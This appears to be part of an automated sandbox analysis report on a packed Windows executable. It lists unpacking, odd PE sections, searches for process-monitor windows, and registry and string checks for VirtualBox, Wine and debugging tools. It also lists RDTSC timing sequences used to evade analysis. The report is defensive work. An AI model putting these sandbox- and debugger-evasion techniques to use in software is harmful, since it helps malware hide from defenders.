Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeSection loaded: winrnr.dllJump to behavior
Source: pCElIX19tu.exeStatic file information: File size 4432896 > 1048576
Source: pCElIX19tu.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284c00
Source: pCElIX19tu.exeStatic PE information: Raw size of dpvazfap is bigger than: 0x100000 < 0x1b1a00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\pCElIX19tu.exeUnpacked PE file: 0.2.pCElIX19tu.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dpvazfap:EW;xjlvnvbq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dpvazfap:EW;xjlvnvbq:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: pCElIX19tu.exeStatic PE information: real checksum: 0x43de22 should be: 0x445712
Source: pCElIX19tu.exeStatic PE information: section name:
Source: pCElIX19tu.exeStatic PE information: section name: .idata
Source: pCElIX19tu.exeStatic PE information: section name:
Source: pCElIX19tu.exeStatic PE information: section name: dpvazfap
Source: pCElIX19tu.exeStatic PE information: section name: xjlvnvbq
Source: pCElIX19tu.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\pCElIX19tu.exeCode function: 0_3_01C72BD7 push ecx; iretd 0_3_01C72C29
Source: C:\Users\user\Desktop\pCElIX19tu.exeCode function: 0_3_01C74ED0 push cs; ret 0_3_01C74ED1
Source: C:\Users\user\Desktop\pCElIX19tu.exeCode function: 0_3_01C883F0 pushfd ; ret 0_3_01C883F2
Source: C:\Users\user\Desktop\pCElIX19tu.exeCode function: 0_3_01C77A85 push ss; ret 0_3_01C77A86
Source: C:\Users\user\Desktop\pCElIX19tu.exeCode function: 0_3_01C8859C push ds; ret 0_3_01C885A6
Source: C:\Users\user\Desktop\pCElIX19tu.exeCode function: 0_3_01C72B9A push ecx; iretd 0_3_01C72C29
Source: C:\Users\user\Desktop\pCElIX19tu.exeCode function: 0_3_01C71BB1 push edi; iretd 0_3_01C71C87
Source: C:\Users\user\Desktop\pCElIX19tu.exeCode function: 0_3_01C71655 push ds; ret 0_3_01C71656
Source: C:\Users\user\Desktop\pCElIX19tu.exeCode function: 0_3_01C7C612 push eax; ret 0_3_01C7C611
Source: pCElIX19tu.exeStatic PE information: section name: dpvazfap entropy: 7.955603975345969

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\pCElIX19tu.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\pCElIX19tu.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 156BC62 second address: 156BC67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E353F second address: 16E3545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E3545 second address: 16E3549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E3549 second address: 16E354F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E36B4 second address: 16E36BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E36BA second address: 16E36C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E36C0 second address: 16E36C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E3860 second address: 16E3871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E3871 second address: 16E3877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E3877 second address: 16E387B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E387B second address: 16E387F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E7558 second address: 16E7584 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jl 00007FC7F4EE1C48h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC7F4EE1C56h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E7584 second address: 16E7588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E7588 second address: 16E759C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E759C second address: 16E75B5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC7F4B4AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jo 00007FC7F4B4AE80h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E779E second address: 16E77D1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7F4EE1C58h 0x00000008 jmp 00007FC7F4EE1C52h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC7F4EE1C54h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E78EE second address: 16E7922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007FC7F4B4AE81h 0x0000000d push 00000000h 0x0000000f jo 00007FC7F4B4AE7Ah 0x00000015 mov dx, 6B57h 0x00000019 push 60797A01h 0x0000001e push eax 0x0000001f push edx 0x00000020 jc 00007FC7F4B4AE78h 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16E79EA second address: 16E79EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16F9575 second address: 16F9580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16F9580 second address: 16F9586 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16C7771 second address: 16C779B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 js 00007FC7F4B4AE76h 0x0000000f jmp 00007FC7F4B4AE89h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1705028 second address: 1705030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1705030 second address: 1705034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1705173 second address: 1705177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 170541B second address: 170545E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Fh 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FC7F4B4AE81h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FC7F4B4AE84h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 170545E second address: 170546B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FC7F4EE1C46h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1705772 second address: 170579A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FC7F4B4AE85h 0x0000000d jno 00007FC7F4B4AE76h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 170579A second address: 170579E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 170579E second address: 17057A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17057A8 second address: 17057AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1705A59 second address: 1705A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1705A5F second address: 1705A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1705D42 second address: 1705D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1705D46 second address: 1705D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c jno 00007FC7F4EE1C57h 0x00000012 jmp 00007FC7F4EE1C51h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1706627 second address: 1706631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC7F4B4AE76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16C9200 second address: 16C9208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 170E194 second address: 170E19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 170CED0 second address: 170CEE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 jo 00007FC7F4EE1C46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 170D756 second address: 170D75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 16DF0FF second address: 16DF103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1711230 second address: 1711238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171136A second address: 171136F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1711655 second address: 1711667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007FC7F4B4AE76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1711951 second address: 1711973 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC7F4EE1C52h 0x00000008 push esi 0x00000009 jbe 00007FC7F4EE1C46h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1711973 second address: 171198C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7F4B4AE7Eh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171198C second address: 17119D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC7F4EE1C56h 0x0000000e push esi 0x0000000f jmp 00007FC7F4EE1C59h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17135C2 second address: 17135C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17135C6 second address: 17135D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17139B0 second address: 17139BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC7F4B4AE76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1713B2C second address: 1713B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1713B32 second address: 1713B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1713B36 second address: 1713B47 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC7F4EE1C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1713E47 second address: 1713E51 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC7F4B4AE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1714822 second address: 1714826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
